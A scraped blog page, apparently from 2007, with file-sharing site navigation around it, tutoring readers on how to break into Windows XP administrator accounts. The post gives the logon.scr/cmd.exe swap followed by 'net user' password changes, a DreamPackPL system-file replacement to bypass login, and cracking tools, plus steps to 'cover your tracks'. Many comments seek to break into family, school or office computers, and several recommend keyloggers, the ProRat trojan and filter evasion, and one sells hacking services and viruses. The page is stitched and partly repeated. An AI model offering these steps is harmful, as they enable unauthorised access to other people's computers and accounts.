Free file sharing
Free online storage
Upload, access, share your music, video, photos
Get 10 GB of free space
Upload files
Upload and share single file or entire folder
Sign Up
See what people are sharing…
Search
Files Video Music Photo Books
Stop
Select files...
Upload
Desktop
ToolBar
Mobile
Info | Download Info | Download Symbian | iPhone
"Store It on the Web"
PCW Rating: 93 Superior
Language:
English
* Brazilian Portuguese
* Español
* العربية
* Français
* Polski
* Türkçe
* Bahasa Indonesia
* ไทย
* Italiano (beta)
* 中文
* 日本語
* 한 국어
* Tiếng Việt
* Bahasa Melayu
* Русский
Enterprise | Search | File Sharing | Music Sharing | Photo Sharing | Video Sharing | Document Sharing | 4shared Desktop | 4shared Toolbar
Terms of Use | Privacy | Contact Us | Advertising | Affiliate | Resellers | News | Forum | Blog
Copyright © 2005-2010 4shared.com
Already a user?
Log In
Username or email
Password
Your OpenID account
* Log in using
* Google https://www.google.com/accounts/o8/id
* or
* OpenID
Remember me Forgot password
Showing posts with label Education. Show all posts
Showing posts with label Education. Show all posts
Sunday, May 30, 2010
Tuesday, March 16, 2010
How To Hack Or Crack A Windows XP Administrator Password
Home About Advertise Archives Contact
Clazh | Technology News, Windows, Mac, Google, Internet, Software, Hacks, How To, Tutorials & Guides
Design Shop XHTML, CSS, Templates, Wordpress Themes. Downloads Code & Design Samples, Wordpress Themes. Subscribe 1247 Readers. Newsletter, Mobile Alerts, RSS Feed.
Apple Blogging Google Hardware Icons Internet iPhone Microsoft Open Source Software Tutorial Web-Design Wordpress
01
APR
07
How To Hack Or Crack A Windows XP Administrator Password
Arpit Jacob Print Email
Bookmark & Share
84 Comments
This is provided only for educational purpose it is a simple way to Recover, Hack or Crack the Window XP Administrator Password. There are different Methods that I have outlined below.
Windows XP Privilege Escalation Exploit
(Before you continue Read the Updates at the bottom)
Here are the steps involved to Hack the Window XP Administrator Password .
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32\temphack
copy logon.scr C:\windows\system32\logon.scr
copy cmd.exe C:\windows\system32\cmd.exe
exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.
Hack Or Crack A Windows XP Administrator Password Using OphCrack
Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.
Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.
Recover The Password Using DreamPackPL
Thanks for the steps from Giftson
Steps to Hack into a Windows XP Computer without changing password:
Get physical access to the machine. Remember that it must have a CD or DVD drive.
Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
Use any burning program that can burn ISO images.
After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
Press “R” to install DreamPackPL.
Press “C” to install DreamPackPL by using the recovery console.
Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
Type “exit”, take out disk and reboot.
In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
Click the top graphic on the DreamPack menu and you will get a menu popup.
Go to commands and enable the options and enable the god command.
Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.
Recover All Windows Password Including Vista With Login Recovery
Login Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.
There are three steps Involved
Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
(click here for a CD version)
Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)
This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).
Favorites More
Categories [ Microsoft, Technology ] Tags [ Hacking, Security, Windows ]
Both comments and pings are currently closed.
84 Responses
hi good information i search many sites but it is very clear and the system which i have is limited priviliges so i cant able to create a file in system32 folder i downloaded the oph crack i cant able to boot from cd plz help me in case to break the admin privilages or to know admin without changing the password
Bunni Posted On Apr 18, 07
I Want A password Off adminstartor When Ill Use That The Password Will Go into I w8 4 ur Answer
John Posted On Apr 24, 07
can u please tell me how we can hack onto bebo without it being blocked at skool ?? get bak to me a.s.a.p thanx
Zakaenah Posted On Apr 27, 07
this a worst method any other ezay method would u have if yes than mail me
thks
Pradeep Posted On Apr 28, 07
to get access to bebo and other sites, look for proxy sites
votebigbird.com and orkuch.com is some proxy sites that can be used
Anon Posted On May 03, 07
none of dem sytes work in skool all the proxy sotes gt hacked how do i get on bebo now
if ne1 can elp me plz le me no
luff yooh all jaydee
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Berm_wifey_4_lyfe Posted On May 04, 07
Hey this is very clear except for step 2. How to could you insert the disk into the computer before turning it on. I know that this is a stupid question but plz get get back 2 me.
Russ James Posted On May 05, 07
Yo I’m using the login recovery method but there’s a problem. Whenever I try to upload the password using the pair of lines, it always fails because of a corrupt password file. Can u help me?
Russ James Posted On May 08, 07
yo sup maii nikkahz! juz askin how doh i get on bebo at skool?????? all tha webz n proxyz r blokked!
Ate Tay Posted On May 08, 07
to get blocked website at school, i use myinternetisblocked.com, i know it works for youtube myspace facebook and others, not sure about these…
-post back for feedback
Matt Posted On May 10, 07
Dear sir,
If u r a hacker then you will have to know that we are restricked to create a nw folder in system32 folder with in a limted user accounts…………
Dashydude Posted On May 11, 07
AJ,
Have you heard tht u can recover a password using caculator.
not the pocket ones that we get in India,…but high quality TI calculators
i know .. it wud be gud if i let u search on it.
Master Posted On May 12, 07
You could always use orphcrack.
Sauron Posted On May 13, 07
Sorry meant ophcrack.
This way does work but not on all computers.
I used it on one computer and it worked.
But I used it to get on an account on my moms computer and access was denied.
ophcrack is an interesting program like it, but it doesn’t ALWAYS get the passwords, mainly the ones with symbols are the ones that don’t read right.
As in it won’t find the password.
But for idiots that use words like “Peaches” it works.
Sauron Posted On May 13, 07
i forgot my password and ineed to get in to my account.theres only one more account and it is limmited
Sami Posted On May 17, 07
forgot my password and ineed to get in to my account.theres only one more account and it is limmited.what do i do??????????
Sami Posted On May 17, 07
You should be able to use this method on a limited account, if not check out,http://ophcrack.sourceforge.net/
Sauron Posted On May 17, 07
does anyone know how to get onto facebook from school when its blocked?
Kendra Posted On May 18, 07
what about limited accounts ? what about if i can not boot from anything ? what soft can i use to find, not to crack, the admin pass ? the bios is pass protected!
Marry Posted On May 26, 07
me and my wife are seperated i am listed as the owner on the computer windows xp home but before she left she set her self up as admin how do i change this its driving me nuts i cant do shit
Dale Posted On Jun 07, 07
i tried the one listed at the top of the page but when i get to a certain line it says access denied why?
Dale Posted On Jun 07, 07
my brother make my account as limited account but he has himself an administrator account is there is any way to hack his password or to make again my account as administrator
Abdullah Posted On Jun 10, 07
So this technique doesnt work at the particular school I attend. Dos says something about to many parameters to fill. And the file not actually existing.
Kal Posted On Jun 14, 07
well, it didt work.
Cab_Axial Posted On Jun 24, 07
the Windows XP Privilege Escalation Exploit way sounds abit confusing to me actually it sounds like shit,
try ERD Commander 2005 v5.0 BOOT CD its very easy to use you can download this file from ares p2p thats where I got my file from and oh yes youll need a iso burner to make your boot cd once youve burnt your boot cd all you have to do us reboot your machine erd commander boots up into a windows like state interface all you need to do then is use the wizard in start thats it within seconds you will reset your admin password no copy and pasting writing scripts or dos command changing or what ever shit even a kid can use this tool thats how simple it is.
Monkeysee Posted On Jun 26, 07
this guy who subitted this thread starter sounds like an idiot he doesn’t even respond to any of these follow up questions it kinda makes me think that hes copied and pasted this post off another site or what ever and doesn’t even know how to use his bullshit program that hes recommended I cant stand these kinds of idiots
Monkeysee Posted On Jun 26, 07
@monkeysee:
…try ERD Commander 2005 v5.0 BOOT CD its …
1. For your ERD Boot CD, you need to have a CD drive on the system. This is not always the case, especially in offices.
…sounds like an idiot he doesn’t even respond to any of these follow up questions …
2. You never RAISED any questions which needed to be answered. So DON’T flame. Be a nice guy when you enter someone’s house.
…copied and pasted this post off another site…
3. Read things properly (a) to know that he’s mentioned the sites from which he’s used the data, (b) to avoid any CONFUSION in understanding simple lines in english.
4. I don’t really like to do this but next time you wish to suggest your skript kiddi3 thingy, please leave a link to your url. I don’t really prefer anonymous flames.
5. What Arpit has written is meant for a BEGINNER level audience. Now again, if you wish to see something really really in action, you might want to read the SAM file by writing your own code (no Cain, Ophcrack etc.), get the hashes, and crack them using Rainbow tables… Oh! wait. You might want to code your own Rainbow table generator. :)
Bipin 3~ Upadhyay Posted On Jun 27, 07
this is really apeared to be a nice trick.
i will definatly try it.
as an cyber security expert it may going to help me lot.
Jitendra Ukhardu Chavhan Posted On Jul 05, 07
Thx for all the info m8 but i’ve got 1 problem. My dad is the computer administrator and i’ve made a bet with him that i could crack his user account. I can access a limited account but when i tried the command promt thing (*first instructions) it didnt let me create the folder. Pls help me i really need help!
Eriko Posted On Jul 15, 07
@Eriko:
Suggestion: Try using a keylogger.
Advice:
1. Do no follow the suggestion given above. It might pi** him off.
2. Never mess with parents and females.
Bipin 3~ Upadhyay Posted On Jul 16, 07
everythings fine but i just cant open system 32 from dos in my limited account
San Posted On Jul 18, 07
i have a problem in login windows xp
some one change my administrator password to login windows xp . i have a difficulty to enter windows xp
now how can i enter in windows xp please help me.
thanks
Suresh Panchal Posted On Jul 24, 07
I want a particular password which I can enter any Windows Xp
Adil Posted On Jul 27, 07
good information i tried to go through but i am always faced with thus
a duplicated name exit or file cannot be found… what should be the first thing i should do ?
thanks looking forward on your usual assistance
Bingi Man Posted On Jul 29, 07
this guy wrote this for begginners and it’s quite good, if your advanced then try booting the computer with something that will give you access to the hard disks, like Puppy or Austrumi or even DOS and extract the sam file to a convenient location, then crack the SAM with LCP or something, extract the hash and rainbow it
Mini Posted On Jul 30, 07
this process is successful
Jitendra Posted On Aug 31, 07
Hey kids want to now how to get on your limited account with time restrictions well listen up before you log on unplug the network cable and then log on then plug the network cable back in That easy!
Corey Posted On Sep 01, 07
Do anybody know how to hack any computer, lol i want to know, i f you know how to hack a computer from far away send an email to mikej941126@hotmail.com If you know send it quick, i will send you a thank you note and i will add you at my email
Themajestic Posted On Sep 02, 07
Ok please no more noobs call getting on to a website through a proxy call it hacking, and please read the methods at the top before just posting things like “how do I get the admin password?”.
Anyone having genuine problems I can recommend Ophcrack as most people, schools etc do not bother to set up a bios password which will allow you to set the CD as the default boot device by pressing F2/F12/DEL at startup to get into the bios menu. Once you have done this it usually takes about 10-15 minutes to boot up and get the password.
This is a particularly easy and clean method of getting the admin password and I recommend it to anyone, especially noobs as it has a GUI.
Bob Posted On Sep 03, 07
The only thing that comes on the monitor is the password request. Cannot go anywhere else……. don’t know the password though…… what do i do? All these instructions don’t help me….. cause i can’t even get past the password request……….what should i do?
Evey Posted On Sep 04, 07
Get on a website @ school by opening CMD then typing “ping sitenamehere” (eg. “ping bebo.com” minus quotations) Then type the IP address into an internet browser after “http://”
Pat Posted On Sep 13, 07
FRIKIN PIMP
Uriel Carbajal Posted On Sep 14, 07
anyone knows how to crack passwords in a network system?
ophcrack can only crack some passwords on the computer…
PandaWarlord@Hotmail.Com Posted On Sep 18, 07
I’m the Systems Administrator at our school, but sometimes the head admin changes the passwords and doesn’t give them to us. I have had the most success with keyloggers. they seem to always work.
And yes! I know you cant install things on a school computer with a limited account. BUT! you can install it on a Flash drive or External Hard disk. do it at home that way if it needs special file permissions it will be able to access them. then bring that said drive to school plug it in and boot the keylogger. a good one will run in the background and usually wont be found by an antivius program.
convince them to type the password for some reason… I said I needed to install drivers for my camera. and the log got it right away!!
Have fun! and don’t get caught!!
Uber@HAXoR
Uber@HAXoR Posted On Sep 23, 07
please send me idea to hack password of administrator of computer with xp
Cool Posted On Sep 24, 07
How can I get or crack Administrative rights as I am on a office network. We have no rights at all, cant instal or unistal. please help. is there any that i can get or crack network administrator rights or password. thanks
Thorn Posted On Sep 25, 07
mmm, this does not work for me on my latest PC. windows.system32 is not writable.
Works fine on old pc though.
Denied Posted On Sep 29, 07
forgot to ask: does any one now how to:
backup the password file,
replace it with a password file which has a known admin password
then you can do whatever you like
then restored the old one
Denied Posted On Sep 29, 07
You can access one of the proxy sites I made at school, just dont let anyone see you doing it and you have a way to get around school blocking software for life. goto
http://66.212.18.5/portal/browse.php
you will be able to goto myspace and other sites just type the url in were myspace.com is and click go.
Hackmaster Posted On Oct 22, 07
If anyone is intrested in a personal hacker email me at internet_legal_services@hotmail.com
First hack is free, a 12 month membership of hacks is 30 us dollars.
Also with 12 month membership downloadable viruses.
Hackmaster Posted On Oct 22, 07
Is the link (http://www.d–b.webpark.pl/dreampackpl_en.htm) bad? I used Firefox and IE but there were errors on both browsers. Can anyone send me the .iso image please…?
PandaWarlord@Hotmail.Com Posted On Oct 23, 07
To Hack Into Bebo,Myspace And Etc Go To Google And Out In gpass1.com/proxy
Trevonte Posted On Oct 30, 07
please send me idea to hack password of administrator of computer with xp when my account is limited
Wcr Posted On Nov 03, 07
how to get windows xp password file while my account is limited
Wcr Posted On Nov 03, 07
can u tell me some what clear to do it..!
Kar Posted On Nov 06, 07
didnt work it said access denied
Raj Posted On Nov 08, 07
in how to hack password on number 8 the computer denys the access what should i do
Kaya Posted On Nov 12, 07
I have a system and i havn’t xp cd now and i forgot my administrator password or user account password,can i againg access my system without format my system ? I’m waiting for your answer.
Dharm Posted On Nov 13, 07
Easy.A dumb Admin. kept Banning me so i gave him a good hacking
Yoshitsune Asakura Posted On Nov 16, 07
Hey,i tried to hack again,but the computer said that ”the syntax of the command is incorrect”and it also said”duplicate file exists or has been copied’’someone please reply and explain to me what I did wrong.thank you.
Yoshitsune Asakura Posted On Nov 16, 07
i began hacking again,but the computer said”the syntax of the command is incorrect’’some one please post back and explain what i did wrong cuz this never happened before.
Yoshitsune Asakura Posted On Nov 16, 07
so complicated…heres the easiest way..goto run, type cmd, type net users administrator then press enter, enter now any password you want
Bill Posted On Nov 20, 07
i forgot, after administrator type * and thats all
Bill Posted On Nov 21, 07
bill, this only works if you already have administrative rights.(which really defeats the purpose of doing it since you already have admin access.)
Pandawarlord@Hotmail.Com Posted On Nov 22, 07
thats true pandawatord…. but if youre running as guest or without admin prive… you donot have administrative rights to create directory such as “temphack” or any other, You cant do hacking afterall unless you’ll pull it out the HDD. the purpose of this is if you donot know the password of administrator or any user of the PC.
If you are one of the users with administrative rights, you can do this or to any other users. I hope, I shared something
Bill Posted On Nov 23, 07
Whoever wrote the explanation for this doesn’t know a damn thing about cmd. MKDIR or MD are commands that create folders. *Sigh* I knew that when I was like 10 years old…
Not Telling Posted On Dec 04, 07
how to crack time ristriction on computer at cybercafe
Umesh Posted On Dec 26, 07
This does not work for me, I assume it’s becuase a .scr file isn’t loaded like an exe ??? I’ve tried command.com too which seems like the right one to use if this were going to work, maybe I just like trying to sound smart.
DerreK Posted On Jan 04, 08
Hello, i am no expert but until i recently converted to OSX i have been a long term windows user. As for accessing a standalone NT based windows machine (i.e. NT, 2000, XP, VISTA) you use the login command prompt method. In my personal opinion if you are not savvy enough to know the workaround for the NTFS file security then you should not even attempt to “hack” these computers.
As for the banned websites, the chances are that your internet settings are configured to run through a ISA server, most of which are PROXY based. In this case i would recommend using a WMI or VBS script that delegates system level control and changes the setting therefore bypassing the GPO that enforced it. Also for those that are aware there are various group policy enumeration exploits that can be initiated from a client machine.
I will warn anybody that reads this, that using any of the above techniques without written permission is a breach of the various computer security laws and data protection acts. I was caught for using unauthorised scripts and GPO exploits my by previous school, i very closely escaped a criminal record. I am 16.
Happy Hacking
n00bs
Jack Hunt Posted On Jan 05, 08
This is a very good hack I actually used it sometime back for personal gain but, about the blocked websites in schools you can just find proxy servers around the Internet just as useful as what Mr.Hunt had to say.
Jeff Posted On Jan 07, 08
i need help my uncle set our computer up and i dont have downloading privliges and he set up to admin acounts so i cant use the F8 trick or the command net user admin1234 trick either i have been looking hard but i cant seem to find any way around this im truly stuck get back to ma asap…..plzzzzzzz.
Aboyinneed Posted On Jan 08, 08
i need help my uncle set our computer up and i dont have downloading privliges and he set up two admin acounts so i cant use the F8 trick or the command net user admin1234 trick either i have been looking hard but i cant seem to find any way around this im truly stuck get back to ma asap…..plzzzzzzz.
Aboyinneed Posted On Jan 08, 08
sorry to be so buggy. but i have another issue, internet explorer 7 was installed on my computer and now when i try to go to certain sites it most of the time wont let me on and if it does it looks all white with blue border like my myspace my aol email etc… i really need help plzzz get back to me asap.
Aboyinneed Posted On Jan 08, 08
i wanna knw abt how can i get Proxies..which is uses in Yahoo id Cracker??Waiting for ya Reply..Tyvm
John Posted On Jan 10, 08
does this method delete the current password or just bypass it? kuz i dont want anyone to find out i logged on. thanks
Andy Posted On Jan 13, 08
If you want an application that bypasses all passwords, download “windows key” or “jtr”. Win Commander is also good. All you have to do with these applications is boot them as an ISO from cd and it will delete all password hashes from the system…. there is no way to extract a password as that would take months using a brute force attack.
TO ALL!!!! Posted On Jan 16, 08
i want to change pirated window xp into valid window xp
what to do Plz help me
Raghav Posted On Jan 20, 08
YOU ALL ARE NOOBS, IF YOU ACTUALLY KNOW ANYTHING ABOUT COMPUTERS YOU CAN USE THE FIRST METHOD EXPLAINED, FIRST TO THE ONE TRUE IDIOT I SAW “SYSTEM 32″ DOESNT HAVE A SPACE “SYSTEM32″ IF CMD.EXE DOESNT WORK USE COMMAND.COM, IF THE COMPUTER IS ON A NETWORK WHEN YOU ENTER YOUR LOGIN INFO… UNPLUG THE ETHERNET CORD AS SOON AS IT STARTS LOADING, USUALLY GIVES YOU ADMIN RIGHTS,
PEACE OUT BITCHES!
MastRHakeR Posted On Feb 11, 08
O.K newbies if you need to crack a fucking password i suggest you get a program called ProRat(there are many versions, each works slightly diff. and has diff features)burn it onto a cd/ get on your computer limited access.if your having trouble downloading do it a friends house and jus save prorat to cd… download the prorat client/your anti-virus will go off,. just download it anyway. pay attention to the filename youll need to delete it manually later)after you download the client on your computer/ open the prorat program., this program is much like a trojan in the fact that you can do alot more than just get passwords but for efforts sake we will go with this. scroll in the program and look for the “get passwords” this feature tells the client/intruder to look in your computers system files and retrieve the pass words which displays them from pro rat to you.,. after you have retrieved your passwords. go to start/ click search/ then search for the client file you downloaded and delete it., the restart your computer with the passwords in hand,. PRORAT is just one great way of cracking/hacking., the tutorials on this site are very well written and very precise,., I love educational information..-I.T HONORS STUDENT
p.s you will get prorat off of ares or bit-torrent(BE CAREFUL WHEN SEARCHING FOR THESE KINDS OF PROGRAMS THATS HOW PEOPLE LIKE ME GET YOU NEWBIES)
ITPRO Posted On Feb 23, 08
when all else fails join the crowd., this is how to keep from being hacked.,., Never give out personal info to anyone., emails are a dime a dozen and are merely unimportant if you dont use the internet for business so if your a casual user and dont bank or buy online. a hacked email is a hacked email find another provider and be even more careful., never ever let people play with your computer they are too expensive to be treated like toys or for your buddy jonny to be downloading a cool jam and at the same time downloading a file that has been tagged with a client that allows me to see everything you will do simply by clicking “YES” when your comp. prompts “ARE YOU SURE YOU WANT TO DOWNLOAD”. IF a fle looks suspicious dont download it. Example REAL CRACKED APP.
Photoshopcs3……545mb
Photoshopcs3……612mb
Photoshopcs3……589mb
Examples of fakes..(TYPICALLY APPLIES FOR ALL)
Photoshopcs3……121 kb
Photoshopcs3……1029 kb
photoshopcs3……2.2 mb
fake program files are how most hackers invade your box.,. Hackers arent stupid and hacking is illegal no real hacker is ever going to admit it. Its a lowly job but someone has to do it haha., lets keep it moving if you bank or buy online and it reqires credit or social sec #’s make sure you are over a secure connection., in most cases even if you are infected with a virus spyware etc the information you send through a secure server wiill be encrypted and decrypted later by the people who recieve your info., moving on PASSWORDS,. there are people everyday that wake up and say HAh! i want to hack a password., get online with thier fancy lil programs and start playing away.,. lemme show you how to stop that shit right now., most coders not all but most will make passwords crackers based off of dictionaries so a passwrod like “holydiver” would be an easy hack as opposed to a password of “canyon1″.,always add number or txt your self like i had a password that won me a lil competition in school NO ONE CRACKED IT and all it was ” I wnT 2 C You try” the password included 5 spaces a number and only 2 recognisable words., it wouldnt have been worth thier precious time to fool with it. they will give up and go on.
Every now and the you have the occasional hard ass that thinks he is the man with a computer and will figure out some way to hack and mess your stuff up.,. remember its alot easier to replace information but not replacing a computer or repair bills.,. simply re-format your computer if you think there is something major wrong with it.,., that being said i am done preaching…I.T HONORS STUDENT
ITPRO Posted On Feb 23, 08
tell me how to edit system32 in limited account.and tell me what means “hash”
Dil Posted On Feb 27, 08
The system cannot find logon.scr
STFU!!!
JW Posted On Mar 21, 08
Try using the safemode administrator to gain acess to the permnissions of the user accounts on the PC. ive fixed 2 computers this way.
Sinphas Posted On Mar 27, 08
I have tried this and i am not able to get the system32 part to work i have limited priveledges so i think that is reason feed back plz
Tom Posted On Apr 11, 08
Trackbacks/Pingbacks
Scribez How to Hack a Window XP Administrator Password «
RSS Newsletter
Arpit Jacob's Twitter ID\m/ RT @rishi Hey Arpit. Just dropped by to say that you've done awesome work with ZetaLight. The portal looks just too awesome. Congrats!
Get A Free Ad SpotAd Spot Available
Related posts
Recover Lost Forgotten Windows XP Administrator Password
Windows 7 Activation Key Crack By Hackers, Chew WGA & RemoveWGA
Myspace Hack : Profile Url And MySpace Email
How To Hack Myspace Private Profile Picture And Video
Windows Live Suite All Live Products In One?
Tags
Analytics Apple Blogging Download FireFox Free General Google Hacking How To Internet iPhone Mac OSX Microsoft Open Source Photos Plugins Programming Security Social-Networks Software Statistics Templates Themes Tips Tutorial Videos Web 2.0 Web-Design Web-Development Web-Hosting Web-Standards Windows Wordpress
Designed by Arpit Jacob | © Copyright | Disclaimer | Contact Contact Arpit Jacob Arpit Jacob On Facebook Arpit Jacob On Twitter Arpit Jacob On Google
';
Clazh | Technology News, Windows, Mac, Google, Internet, Software, Hacks, How To, Tutorials & Guides
Design Shop XHTML, CSS, Templates, Wordpress Themes. Downloads Code & Design Samples, Wordpress Themes. Subscribe 1247 Readers. Newsletter, Mobile Alerts, RSS Feed.
Apple Blogging Google Hardware Icons Internet iPhone Microsoft Open Source Software Tutorial Web-Design Wordpress
01
APR
07
How To Hack Or Crack A Windows XP Administrator Password
Arpit Jacob Print Email
Bookmark & Share
84 Comments
This is provided only for educational purpose it is a simple way to Recover, Hack or Crack the Window XP Administrator Password. There are different Methods that I have outlined below.
Windows XP Privilege Escalation Exploit
(Before you continue Read the Updates at the bottom)
Here are the steps involved to Hack the Window XP Administrator Password .
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32\temphack
copy logon.scr C:\windows\system32\logon.scr
copy cmd.exe C:\windows\system32\cmd.exe
exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.
Hack Or Crack A Windows XP Administrator Password Using OphCrack
Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.
Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.
Recover The Password Using DreamPackPL
Thanks for the steps from Giftson
Steps to Hack into a Windows XP Computer without changing password:
Get physical access to the machine. Remember that it must have a CD or DVD drive.
Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
Use any burning program that can burn ISO images.
After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
Press “R” to install DreamPackPL.
Press “C” to install DreamPackPL by using the recovery console.
Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
Type “exit”, take out disk and reboot.
In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
Click the top graphic on the DreamPack menu and you will get a menu popup.
Go to commands and enable the options and enable the god command.
Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.
Recover All Windows Password Including Vista With Login Recovery
Login Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.
There are three steps Involved
Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
(click here for a CD version)
Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)
This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).
Favorites More
Categories [ Microsoft, Technology ] Tags [ Hacking, Security, Windows ]
Both comments and pings are currently closed.
84 Responses
hi good information i search many sites but it is very clear and the system which i have is limited priviliges so i cant able to create a file in system32 folder i downloaded the oph crack i cant able to boot from cd plz help me in case to break the admin privilages or to know admin without changing the password
Bunni Posted On Apr 18, 07
I Want A password Off adminstartor When Ill Use That The Password Will Go into I w8 4 ur Answer
John Posted On Apr 24, 07
can u please tell me how we can hack onto bebo without it being blocked at skool ?? get bak to me a.s.a.p thanx
Zakaenah Posted On Apr 27, 07
this a worst method any other ezay method would u have if yes than mail me
thks
Pradeep Posted On Apr 28, 07
to get access to bebo and other sites, look for proxy sites
votebigbird.com and orkuch.com is some proxy sites that can be used
Anon Posted On May 03, 07
none of dem sytes work in skool all the proxy sotes gt hacked how do i get on bebo now
if ne1 can elp me plz le me no
luff yooh all jaydee
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Berm_wifey_4_lyfe Posted On May 04, 07
Hey this is very clear except for step 2. How to could you insert the disk into the computer before turning it on. I know that this is a stupid question but plz get get back 2 me.
Russ James Posted On May 05, 07
Yo I’m using the login recovery method but there’s a problem. Whenever I try to upload the password using the pair of lines, it always fails because of a corrupt password file. Can u help me?
Russ James Posted On May 08, 07
yo sup maii nikkahz! juz askin how doh i get on bebo at skool?????? all tha webz n proxyz r blokked!
